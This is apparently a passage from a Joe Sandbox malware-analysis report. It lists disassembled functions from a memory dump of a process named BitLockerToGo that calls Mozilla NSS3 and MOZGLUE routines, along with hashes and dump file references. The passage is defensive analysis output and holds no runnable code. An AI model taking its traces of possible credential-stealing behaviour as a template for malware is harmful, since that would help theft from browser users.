                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDE1B
                                                                                                                                                                                                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C6EDE77
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2700453212-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74946ca31a613f8ab33a7e16d922b65a471de2a665911afdede38f2cce0bf84a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b2c6ae75301916b91a23979963a4b1ea71eeef37b17353d9c100631c05a7f246
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74946ca31a613f8ab33a7e16d922b65a471de2a665911afdede38f2cce0bf84a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3718671A0A318CFDB10CF9AC584689B7F4FF89718F25816ED8586B742DB30A902CF84
                                                                                                                                                                                                                                                                                                                                                          Function 6C65C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C65CA21
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C65CA35
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000), ref: 6C65CA66
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C65CA77
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000), ref: 6C65CAFC
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterErrorSectionValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1974170392-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e84daba9adbd481ea7202405c4f560d25d8a50ca35c64cded30b908a56065716
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e5a1aea27073e1a8aeba03d5c45ccbc53481a850ece0a18cb2a35a407d4c22e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e84daba9adbd481ea7202405c4f560d25d8a50ca35c64cded30b908a56065716
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F941E779E00105ABDF00EF64D845AAB7BB4EF49388F644064ED1A97711EB31D921CBD5
                                                                                                                                                                                                                                                                                                                                                          Function 6C63EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C63EDFD
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6C63EE64
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C63EECC
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C63EEEB
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C63EEF6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3833505462-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b4f1e274b17b579ea2c66fc76452fc7d305af44d4b474ee532a5e6529ca185c5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aaa13d244aa67dc1ed34d244a07a042e7d11b74fe248ace0943f86c1d0f936a9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4f1e274b17b579ea2c66fc76452fc7d305af44d4b474ee532a5e6529ca185c5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3931F571A002209BEB209F29DC44BA77BF4FB46705F142539E85E87A90DB31EC15CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C641DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E0B
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E24
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C641E3B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C641E8A
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C641EAD
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1529734605-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 88637302c0af0d48dd03c1bbfefa206bfe523c07c269b29d3fd7579f76bb4197
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a486e77e0c4a8bae6e1b242089f70475adb78b009208b541fa18b47111ead898
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88637302c0af0d48dd03c1bbfefa206bfe523c07c269b29d3fd7579f76bb4197
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1621F57AE08314ABD7008F68DC40F9B73959B85368F14C638ED695BB80E730D91A87DA
                                                                                                                                                                                                                                                                                                                                                          Function 6C64AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000,00000000), ref: 6C64ADA7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000,00000000), ref: 6C64ADB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C643FFF,?,?,?,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000), ref: 6C64ADD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7694B0,?,?,?,?,?,?,?,?,6C643FFF,00000000,?), ref: 6C64ADEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C643FFF), ref: 6C64AE3C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1d9905ddde8c084e98975fe30ce0e0fbaef812d38d6290d876c5d3db6b076e90
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 63767e362e16aec42960a2e1214e3b83273b588448a8ad24625c308459532337
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9905ddde8c084e98975fe30ce0e0fbaef812d38d6290d876c5d3db6b076e90
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46112971E002156BE7109B659C40FBF77E8DF9624CF04C139FC2596642FB20E95A82AA
                                                                                                                                                                                                                                                                                                                                                          Function 6C698800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2759447159-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b1b95a98c275ebcb7b6acff5dbaaa2ac5a14a7233d725155cdb136530e1dad6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 99500369d62ae1adad033c30cfd17ebc3baee1e795b626a381948ece146aaaa6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1b95a98c275ebcb7b6acff5dbaaa2ac5a14a7233d725155cdb136530e1dad6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 102151B4A04606CFDB00AF78C5841AABBF4FF0A349F114666DC98D7751EB30D495CBA6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6628A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C6580DD), ref: 6C6628BA
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C6580DD), ref: 6C6628D3
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C6580DD), ref: 6C6628E8
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C6580DD), ref: 6C66290E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C6580DD), ref: 6C66291A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: DeleteCriticalSection.KERNEL32(?,?,6C665089,?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C65927F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: free.MOZGLUE(?,?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C659286
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: PL_HashTableDestroy.NSS3(?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C659292
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: TlsGetValue.KERNEL32(00000000,?,6C660948,00000000), ref: 6C658B6B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: EnterCriticalSection.KERNEL32(?,?,?,6C660948,00000000), ref: 6C658B80
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C660948,00000000), ref: 6C658B8F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: PR_Unlock.NSS3(?,?,?,?,6C660948,00000000), ref: 6C658BA1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C660948,00000000), ref: 6C658BAC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: free.MOZGLUE(?,?,?,?,?,6C660948,00000000), ref: 6C658BB8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225375108-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9865ceb6d5bbfa86a035e32b92f0bad410265b4187f4378908e9e53cbcf5d0b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1404d2851c091ceb7555f2c6f04a070024b85aa9212ceec1db346c06a43c4588
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9865ceb6d5bbfa86a035e32b92f0bad410265b4187f4378908e9e53cbcf5d0b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 852130B5A047059FDB00BF79C088459BBF4FF46355F014A69DC9597B00E730E895CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C6309E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,?,6C6306A2,00000000,?), ref: 6C6309F8
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(0000001F), ref: 6C630A18
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C630A33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C630A6C
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C630A87
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
